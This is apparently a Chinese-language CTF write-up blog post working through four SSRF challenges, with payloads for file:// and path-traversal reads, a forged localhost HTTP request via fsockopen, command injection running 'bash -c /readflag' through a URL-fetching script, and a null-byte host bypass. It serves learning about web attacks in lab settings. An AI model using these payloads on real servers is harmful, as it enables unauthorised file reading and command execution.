SSRF

[NISACTF 2022]easyssrf

0x01

这道题的思路比较简单

就是使用ssrf访问文件

image-20231130093853864

给了一个接口,那么就直接访问

image-20231130093925060

跟着他走

file:////fl4g

image-20231130094012524

访问它指定的路径

出现了

file_get_contents

image-20231130094113614

0x02

通过这个函数,我们可以直接访问文件

他又说了文件在flag,所以就直接访问flag

建议直接尝试比较长的路径

?file=../../../../../../../flag

image-20231130094245225

[HNCTF 2022 WEEK2]ez_ssrf已解决

[HNCTF 2022 WEEK2]ez_ssrf | NSSCTF

0x00

访问他给的地址,然后发现这个

image-20231130095243554

出现了

fsockopen()

那就构造数据发送

0x01

/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

data

GET /flag.php HTTP/1.1
Host: 127.0.0.1
Connection: Close

得到flag

这里就相当于是伪造了一个请求,请求了服务端,但是这个host和port不是很理解

image-20231130095633444

[HITCON 2017]SSRFme

这道题需要代码审计

访问,出现了源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
$_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
}

echo $_SERVER["REMOTE_ADDR"];// 以上的只是为了告诉我们ip地址,也就是下面加密需要用到的东西

$sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);//这个是加密路径,相当于url文件访问路径,有了上面的ip就可以计算出这个值
@mkdir($sandbox);//创建目录
@chdir($sandbox);//将当前php的目录改为这个

$data = shell_exec("GET " . escapeshellarg($_GET["url"]));
$info = pathinfo($_GET["filename"]);
$dir = str_replace(".", "", basename($info["dirname"]));
@mkdir($dir);
@chdir($dir);
@file_put_contents(basename($info["basename"]), $data);
highlight_file(__FILE__);

0x00

首先先md5找到对应的路径

786c0b7e11c1e9322763fcc8090ef181

image-20231130160232238

0x01

创建一个目录

?url=/&filename=temp

访问

http://d9768014-7cfd-42d6-841e-07f9b9e5dc90.node4.buuoj.cn/sandbox/786c0b7e11c1e9322763fcc8090ef181/temp

image-20231130160609970

出现了一些路径

image-20231130160640457

有一个readfalg,这个是一个程序,所以我们想办法运行,并且将将运行的数据存放到我们的文件里面

使用bash -c /readflag是使用bash运行程序

/?url=file:bash -c /readflag& filename=bash -c /readflag

/?url=bash -c /readflag & filename=123

然后访问123

http://1e99b289-a06d-43fe-aa18-d5367c10e0d9.node4.buuoj.cn/sandbox/786c0b7e11c1e9322763fcc8090ef181/123

image-20231130165650011

[GKCTF 2020]cve版签到

0x00

抓包抓包抓包

0x01

首先查看源码,对url进行测试,发现没有用

然后抓包,发现端倪

image-20240123115552010

0x02 构造payload

1
http://127.0.0.123%00ctfhub.com

SSRF
https://tsy244.github.io/2024/01/04/CTF刷题记录/WEB/SSRF/
Author
August Rosenberg
Posted on
January 4, 2024
Licensed under